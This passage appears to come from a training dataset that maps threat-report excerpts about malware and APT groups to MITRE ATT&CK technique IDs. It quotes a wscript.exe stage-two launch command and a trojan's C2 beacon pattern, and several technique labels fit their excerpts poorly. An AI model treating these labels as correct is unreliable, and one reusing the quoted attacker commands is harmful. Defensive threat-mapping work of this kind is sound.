Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Fine-tuning DaserfOur analyses revealed Daserf regularly undergo technical improvements to keep itself under the radar against traditional anti-virus (AV) detection. Daserf 1.72 and later versions use the alternative base64+RC4 to encrypt the feedback data, while others use different encryption such as 1.50Z, which uses the Ceasar cipher (which substitutes letters in plaintext with another that corresponds to a number of letters, either upwards or downwards", + "output": "- T1027.005: Obfuscated Files or Information - Indicator Removal from Tools\n- T1027: Obfuscated Files or Information\n- T1027.002: Obfuscated Files or Information - Software Packing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MSTIC previously tracked ACTINIUM activity as DEV-0157, and this group is also referred to publicly as Gamaredon", + "output": "- T1608.001: Stage Capabilities - Upload Malware\n- T1105: Ingress Tool Transfer\n- T1059.005: Command and Scripting Interpreter - Visual Basic\n- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "At first glance, these links generally cause less suspicion for the targets. After opening the links and several redirections, the victims are led to final phishing domains such as \u201cmobile[.]recover-session-service[.]site\u201d etc", + "output": "- T1583.001: Acquire Infrastructure - Domains" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "On July 18, 2018, one day after the AZORult update above was announced, we observed a campaign delivering thousands of messages targeting North America that used the new version of AZORult. The messages used employment-related subjects such as \u201cAbout a role\u201d and \u201cJob Application\u201d. The attached documents used file names in the format of \u201cfirstname.surname_resume.doc", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The executables installed by the compiled AutoIt scripts is a backdoor that Molerats has used in many attack campaigns. Based on our research, the Spark backdoor has been used by Molerats since at least early 2017, as it was the main payload in the Operation Parliament campaign reported by Kaspersky", + "output": "- T1218.007: System Binary Proxy Execution - Msiexec" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To obtain the session ID and pre-shared key, the payload will issue a query to resolve the following domain: mail. random number between 100000 and 999999>.<c2 name> This request notifies the C2 server that the payload is about to send system specific data as part of the initial handshake", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments. Disclosure of this information went through the same IGL process as discussed in the\u00a0Whois Anchor Panda blog post", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To perform this task, the developer used the GDI API: A keylogger is also present in the analyzed sample. The SetWindowsHookEx() API is used to retrieve the stroked keys. The GetKeyNameText() API is used to retrieve a string that represents the name of a key. In addition to the key, the title of the foreground window is stored in order to known where the infected user is typing (by using the GetForegroundWindow() and GetWindowText() API", + "output": "- T1010: Application Window Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "AT&T Alien Labs has discovered new malicious files distributed by the threat actor TeamTNT. The use of open-source tools like Lazagne allows TeamTNT to stay below the radar for a while, making it more difficult for anti-virus companies to detect", + "output": "- T1049: System Network Connections Discovery\n- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It also creates a pipe for inter-process communication (IPC) by calling the pipe() function for getting two file descriptors for reading and writing data. It also enables non-blocking I/O for the writing file descriptor by using ioctl", + "output": "- T1559: Inter-Process Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The threat actor abused the stolen credentials to create rogue, high-privileged domain user accounts which they then used to take malicious action. By creating these accounts, they ensured they would maintain access between different waves of the attack. Once the threat actor regains their foothold, they already have access to a high-privileged domain user account", + "output": "- T1078: Valid Accounts\n- T1136.002: Create Account - Domain Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Since September of 2018, Redaman banking malware has been distributed through malspam. These emails have file attachments. These file attachments are archived Windows executable files disguised as a PDF document. In September 2018, the attachments were zip archives. In October 2018, the attachments were zip archives, 7-zip archives, and rar archives. In November 2018, the attachments were rar archives. And in December 2018, the attachments changed to gzip archives with file names ending in .gz", + "output": "- T1566.001: Phishing - Spearphishing Attachment\n- T1036: Masquerading\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Volexity has worked with multiple victim organizations to assist with incident response efforts and to remedy their compromised systems. This process lead to the identification of different ways the OceanLotus group gains access to the compromised websites and how they maintain access", + "output": "- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Anomali Labs has detected a new campaign by the threat group Rocke. In this campaign, the group has changed from using a Python-based malware to a malware written in Golang. The detection of this new malware is nearly non-existent. In addition, the group uses a private mining pool to reduce the risks of being detected", + "output": "- T1059.006: Command and Scripting Interpreter - Python" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Winnti Linux variant\u2019s core functionality is within \u2018libxselinux\u2019. Upon execution, an embedded configuration is decoded from the data section using a simple XOR cipher. An example Python function to decode this configuration is shown below", + "output": "- T1027: Obfuscated Files or Information\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lazarus Group is one of the most sophisticated North Korean APTs that has been active since 2009. The group is responsible for many high profile attacks in the past and has gained worldwide attention. The Malwarebytes Threat Intelligence team is actively monitoring its activities and was able to spot a new campaign on Jan 18th 2022", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "kaudited \u2014 A file installed as /usr/bin/kaudited. This binary will drop and install several loadable kernel modules (LKMs) on the infected machine. To ensure that the infected machine won\u2019t crash due to the kernel-mode rootkits, it uses different modules for specific kernel versions. The kaudited binary also drops a watchdog component that will monitor the cryptocurrency miner file and process", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These credentials are used in a credential stuffing or password spraying attack against the victim\u2019s remote services, such as webmail or other internet reachable mail services. After obtaining a valid account, they use this account to access the victim\u2019s VPN, Citrix or another remote service that allows access to the network of the victim. Information regarding these remotes services is taken from the mailbox, cloud drive, or other cloud resources accessible by the compromised account. As soon as they have a foothold on a system (also known as patient zero or index case), they check the permissions of the account on that system, and attempt to obtain a list of accounts with administrator privileges. With this list of administrator-accounts, the adversary performs another password spraying attack until a valid admin account is compromised. With this valid admin account, a Cobalt Strike beacon is loaded into memory of patient zero. From here on the adversary stops using the victim\u2019s remote service to access the victim\u2019s network, and starts using the Cobalt Strike beacon for remote access and command and control", + "output": "- T1078.002: Valid Accounts - Domain Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TIN WOODLAWNTIN WOODLAWN is a targeted threat group, active since at least 2014, that CTU researchers assess with moderate confidence is operated or tasked by the Vietnamese government. TIN WOODLAWN is technically capable and uses a range of techniques including template injection, obfuscated macros and steganography for malware delivery, memory-resident malware, use of native command line scripts for Cobalt Strike persistence, and non-standard command and control channels such as DNS and ICMP.ToolsTaegis\u2122 XDR Adversary Software Coverage Tool", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As mentioned in our earlier technical report on Trojan.Hydraq, the back door allows the attacker to perform any of the following activities: - Adjust token privileges. Create, modify, and delete registry subkeys. Retrieve a list of logical drives. Uninstall itself by deleting the HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\RaS[FOUR RANDOM CHARACTERS] subkey", + "output": "- T1012: Query Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Hancitor, a loader that provides Malware as a Service, has been observed distributing malware such as FickerStealer", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The third campaign deployed a different custom RPC backdoor to that used in the second campaign. This backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without using powershell.exe. Prior to execution, the PowerShell scripts were stored Base64-encoded in the registry", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A typical response from the C2 server is a legitimate-looking webpage containing the string \u201c!DOCTYPE html\u201d, which the malware checks. The malware then locates a Base64-encoded blob, which it decodes and proceeds to load as a shellcode", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Malicious web shell activity as observed in the Cybereason solution. Commands executed via a modified version of the China Chopper web shell", + "output": "- T1505.003: Server Software Component - Web Shell\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While the decoy in Figure 2 is displayed, the macro will search the document for the delimiter ###$$$ and write the base64 encoded text that follows this delimiter to the file %APPDATA%\\Base.txt. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http://<c2 domain>/chk. hex(Environment.UserName/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan\u2019s request by echoing the value <hex(Environment.UserName/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http://<c2 domain>/what. hex(Environment.UserName/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Replying to @ESETresearchAttackers replaced win_fw.dll, an internal component that is executed during IDA Pro installation, with a malicious DLL. The malicious win_fw.dll creates a Windows scheduled task that starts a second malicious component, idahelper.dll, from the IDA plugins folder", + "output": "- T1036.004: Masquerading - Masquerade Task or Service\n- T1574.002: Hijack Execution Flow - DLL Side-Loading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The maldocs used in this campaign typically contain a malicious VBA macro that downloads and activates the next stage of the infection chain. Although the VBA macro contains an auto open subroutine, it uses several VBA functions registered to trigger if the \"\"Typing replaces selection\"\" property is enabled in Microsoft Word. Appdata%\\desktop.iniThe next stage of the VBS is run using wscript.exe using a command such as:%windir%\\System32\\wscript.exe //e:vbscript //b <path_to_Stage_2>Macros dropping VBS to disk and running via wscript.exe\"", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The injection function is responsible for resolving all the required API calls. It then opens a handle to the target process by using the OpenProcess API. It uses the SizeOfImage field in the NT header of the DLL to be injected into allocated space into the target process along with a separate space for the init_dll function. The purpose of the init_dll function is to initialize the injected DLL and then pass the control flow to the entry point of the DLL. One thing to note here is a simple CreateRemoteThread method is used to start a thread inside the target process unlike the KernelCallbackTable technique used in our macro", + "output": "- T1104: Multi-Stage Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. SDBbot is composed of three pieces: an installer, a loader, and a RAT component", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This would save them the trouble of needing to load additional malware to exfiltrate files or other material. We are aware of no evidence of follow-up interactions between the operators and successful victims as part of any extortion attempts. Furthermore, Stealth Falcon\u2019s use of JavaScript to profile and de-anonymize victims seems inconsistent with a primary motivation of collecting information that could be used for blackmail", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Siloscape mimics CExecSvc.exe privileges by impersonating its main thread and then calls NtSetInformationSymbolicLink on a newly created symbolic link to break out of the container", + "output": "- T1134.001: Access Token Manipulation - Token Impersonation/Theft" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "One unique and fairly recent variant is a plain downloader that follows a similar convention to the aforementioned MarkiRAT implants. It also leverages MFC and embeds its logic within a CDialog class, getting executed upon initiation of an MFC dialog object during runtime. The use of this sample diverges from those used by the group in the past, where the payload was dropped by the malware itself, suggesting that the group might be in the process of changing some of its TTPs", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In past attacks, the Ragnar Locker group has used exploits of managed service providers or attacks on Windows Remote Desktop Protocol (RDP) connections to gain a foothold on targeted networks", + "output": "- T1543.003: Create or Modify System Process - Windows Service\n- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once gaining the initial foothold into a container, Hildegard establishes either a tmate session or an IRC channel back to the C2. It is unclear how TeamTNT chooses and tasks between these two C2 channels, as both can serve the same purpose. Unit 42 researchers have not observed any commands in the IRC channel. However, the IRC server's metadata indicates that the server was deployed on Jan", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Grants system privileges via Windows services - Uses DLL sideloading technique to evade security solutions - Starts and injects code to a new svchost process to prevent tracking", + "output": "- T1055: Process Injection\n- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Analysis of BRONZE BUTLER's operations, targeting, and capability led CTU researchers to assess that it is likely that the group is located in the PRC. The group has used spearphishing, strategic web compromises (SWCs), and an exploit of a zero-day vulnerability to compromise targeted systems. After exfiltrating targeted data from a network, BRONZE BUTLER typically deletes evidence of its activities. However, it maintains access to compromised environments when possible, periodically revisiting compromised sites to identify new opportunities for data exfiltration", + "output": "- T1087.002: Account Discovery - Domain Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Also, the PlugX that Mustang Panda APT uses has some extra features, including spreading through USB, gathering information, and stealing documents in air-gaped networks via USB", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method\n- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The following commands were used to create and add the DefaultUser account to the local Administrators group, and subsequently hide the account from the Windows logon screen", + "output": "- T1098: Account Manipulation\n- T1087.001: Account Discovery - Local Account\n- T1564.002: Hide Artifacts - Hidden Users\n- T1136.001: Create Account - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your 